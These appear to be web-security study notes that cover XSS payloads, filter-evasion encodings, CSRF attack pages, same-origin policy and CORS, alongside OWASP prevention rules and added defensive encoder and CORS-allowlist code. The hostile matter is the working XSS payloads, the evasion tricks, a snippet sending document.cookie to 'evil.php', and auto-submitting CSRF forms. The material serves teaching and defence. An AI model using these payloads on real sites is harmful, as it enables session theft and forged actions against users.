Cross-site Scripting (XSS)

Malicious code injection

XSS using Script in Attributes

XSS attacks may be conducted without using <script> tags. Other tags will do exactly the same thing, for example:

<body onload=alert('test1')>

or other attributes like: onmouseover, onerror.
onmouseover

<b onmouseover=alert('Wufff!')>click me!</b>

onerror

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>

XSS using Script Via Encoded URI Schemes

Use encoding to bypass filters, e.g. a = &#X41 (UTF-8)

<IMG SRC=j&#X41vascript:alert('test2')>

XSS using code encoding

We may encode our script in base64 and place it in a META tag.

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg">

Pseudo-protocol (data: URI)

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a>

Reflected XSS

Obtaining the user's cookies

<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>

Stored XSS

Highly covert

DOM(Document Object Model) XSS

The HTML page is modified dynamically on the client

<body>
<script>
document.write(document.location.href.substring(document.location.href.indexOf("default=")+8));
</script>
</body>

The malicious script can be embedded in the URL as follows in two ways:

http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
or
http://www.some.site/page.html#default=<script>alert(document.cookie)</script>

Browser protection (automatic URL encoding):
%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS: submitting a form via Ajax to getshell

XSS (Cross Site Scripting) Prevention Cheat Sheet

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

  1. Carefully validate untrusted data
  2. HTML entity encoding: you MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.

XSS Prevention Rules

RULE #0 don’t put untrusted data into your HTML document
RULE #1 HTML Escape

& --> &amp;
< --> &lt;
> --> &gt;
" --> &quot;
' --> &#x27; (&apos; is in the XML and XHTML specs but not in the HTML spec, so it is not recommended)
/ --> &#x2F; forward slash is included as it helps end an HTML entity

RULE #2 - Attribute Escape

<input type="text" name="fname" value="UNTRUSTED DATA">

RULE #3 - JavaScript Escape

<script>var currentValue='UNTRUSTED DATA';</script>
<script>someFunction('UNTRUSTED DATA');</script>
// encoded:
<SCRIPT>alert("XSS")</SCRIPT>
&lt;SCRIPT&gt;alert&#x28;&quot;XSS&quot;&#x29;&lt;&#x2f;SCRIPT&gt;

  • Ensure JavaScript variables are quoted
  • JavaScript Hex Encoding
  • JavaScript Unicode Encoding
  • Avoid backslash encoding (\" or \' or \\)

RULE #4 - CSS Escape And Strictly Validate

<div style="width: UNTRUSTED DATA;">Selection</div>

  • CSS Hex encoding

Except for alphanumeric characters, escape all characters with ASCII values less than 256 with the \HH escaping format.

RULE #5 - URL Escape

<a href="/site/search?value=<?php echo urlencode($_GET['url']) ?>">clickme</a>

RULE #6 - Sanitize HTML Markup
PHP Html Purifier - http://htmlpurifier.org/
RULE #7 - Prevent DOM-based XSS
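Context-aware encoders for rules #1 to #5 above, plus a safe reader for the "default=" value that the DOM XSS snippet earlier writes straight into the page (rule #7). This is example code added here, not OWASP's or the original notes' code; the hex() helper and the function names are my own.

```javascript
// Context-aware output encoders for OWASP rules #1-#5, plus a safe reader for
// the "default=" value used by the DOM XSS snippet (rule #7). Example code
// added for this page; not OWASP's or the original notes' own code.

// RULE #1: HTML body escape using exactly the six entities listed above.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Hex code of one UTF-16 unit, zero-padded to at least `width` digits.
const hex = (c, width) =>
  c.charCodeAt(0).toString(16).toUpperCase().padStart(width, "0");

// RULE #2: attribute escape - every non-alphanumeric becomes &#xHH;, so the
// value can never close the quote it sits in or start a new attribute.
function escapeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => "&#x" + hex(c, 2) + ";");
}

// RULE #3: JavaScript string escape - \xHH below 256, \uHHHH above; no \' or \".
function escapeJs(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) =>
    c.charCodeAt(0) < 256 ? "\\x" + hex(c, 2) : "\\u" + hex(c, 4));
}

// RULE #4: CSS escape - \HH plus a terminating space, so a following hex digit
// is not swallowed into the escape (CSS reads up to six hex digits).
function escapeCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => "\\" + hex(c, 2) + " ");
}

// RULE #5: URL parameter escape (like PHP urlencode); encodeURIComponent
// leaves !'()* alone, so they are encoded explicitly.
function escapeUrlParam(s) {
  return encodeURIComponent(String(s)).replace(/[!'()*]/g, (c) => "%" + hex(c, 2));
}

// RULE #7: read "default=" from the query or the fragment (both URL forms
// shown above) and HTML-escape it before it reaches document.write/innerHTML.
function safeDefaultHtml(href) {
  const m = /[?#&]default=([^&#]*)/.exec(String(href));
  if (!m) return "";
  let value;
  try { value = decodeURIComponent(m[1]); } catch (e) { value = m[1]; }
  return escapeHtml(value);
}
```

Each encoder is for one context only; using escapeHtml inside a script block or an attribute value is exactly the mistake rules #2 and #3 warn about.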

Others
Use HTTPOnly cookie flag

XSS Filter Evasion

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

  • XSS Platform
  • XSS encoding
  • OWASP XSSER

  1. Encoding

URL encoding: space (%20)
HTML entity encoding: < (&lt;)
Character encoding (decimal or hexadecimal ASCII code, or Unicode): < (&#60;) > (&#62;)
JS encoding: < (\u003c) > (\u003e)
CSS encoding: \65

HTML entity encoding

Displayed  Description          Entity name                   Entity number
(space)    non-breaking space   &nbsp;                        &#160;
<          less-than sign       &lt;                          &#60;
>          greater-than sign    &gt;                          &#62;
&          ampersand            &amp;                         &#38;
"          quotation mark       &quot;                        &#34;
'          apostrophe           &apos; (not supported by IE)  &#39;

Unicode encoding

<a onclick="javascript:alert(/xss/)">click</a>
<a onclick="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;">click</a>

  2. Single quotes (avoiding them)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

  3. Others

Separate with a tab character
<IMG SRC="jav ascript:alert('XSS');">

Encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

Using tab, newline and carriage return characters

Inserting a newline; only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

Type                   Horizontal Tab   New line       Carriage Return
URL                    %09              %10            %13
Minimal Sized Hex      &#x9             &#xA           &#xD
Maximum Sized Hex      &#x0000009;      &#x000000A;    &#x000000D;
Minimum Sized Decimal  &#9              &#10           &#13
Maximum Sized Decimal  &#x0000009;      &#x0000009;    &#0000009;

Cross-Site Request Forgery (CSRF)

Submitting data to the server on the victim's behalf

A page on a.com makes a request to b.com (or the victim clicks a link in an e-mail to example.com/delete?rule=*); some browsers will automatically send the user's cookies with that request.

<iframe src="http://b.com/test.php"></iframe>

  • Automatically delete articles
  • Automatically add an administrator account

GET scenario

<img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="0" height="0" border="0">

POST scenario

<!-- csrftest.html -->
<html>
<body onload='document.CSRF.submit()'>
<!-- a form field named 'submit' would conflict with form.submit() -->
<form action='http://tagetWebsite/Authenticate.jsp' method='POST' name='CSRF'>
<input type='hidden' name='name' value='Hacked'>
<input type='hidden' name='password' value='Hacked'>
</form>
</body>
</html>

Combined with an XSS vulnerability, the attack is completely silent.

Prevent CSRF Vulnerabilities

  1. Check standard headers to verify the request is same origin

    • Origin Header
    • Referer Header (Referer checks can be bypassed)
  2. AND Check CSRF token

same-origin policy

Same-origin policy: same protocol, same domain and same port are required; cross-origin access is not allowed.

How can cross-origin access be allowed?

1. Access-Control-Allow-Origin header

a.com allows other origins to access its resources:

<?php header("Access-Control-Allow-Origin: *"); ?>

b.com

$.get("http://a.com/test.php", function(data){
alert(data);
});
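The a.com example above answers every origin with "*". An allowlisted alternative, as added example code (Node.js) that is not part of the original notes: reflect the caller's origin only when it is on the list and mark the response as varying by Origin. The allowlist entries are constructed values.

```javascript
// Allowlisted CORS instead of "Access-Control-Allow-Origin: *". Example code
// added for this page (Node.js); the allowlist entries are constructed.
const ALLOWED_ORIGINS = new Set(["https://b.example", "https://app.b.example"]);

// Returns the CORS headers to add for this request, or an empty object when
// the Origin is absent, malformed (e.g. "null") or not allowlisted; without
// the header the browser blocks the cross-origin read, which is the safe default.
function corsHeadersFor(requestHeaders) {
  const origin = requestHeaders.origin;
  if (typeof origin !== "string") return {};
  let normalized;
  try { normalized = new URL(origin).origin; } catch (e) { return {}; }
  // Exact-match the whole origin: "https://b.example.evil.test" is not b.example.
  if (normalized !== origin || !ALLOWED_ORIGINS.has(normalized)) return {};
  return {
    "Access-Control-Allow-Origin": normalized, // a specific origin, never "*",
                                              // which browsers also refuse for
                                              // credentialed (cookie) requests
    "Vary": "Origin",                         // keep caches from mixing origins
  };
}
```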

2. getJSON

1
$.getJSON("http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=?", function(data){
    // handle the returned JSON here
});

3. iframe

Cross-domain policy file

crossdomain.xml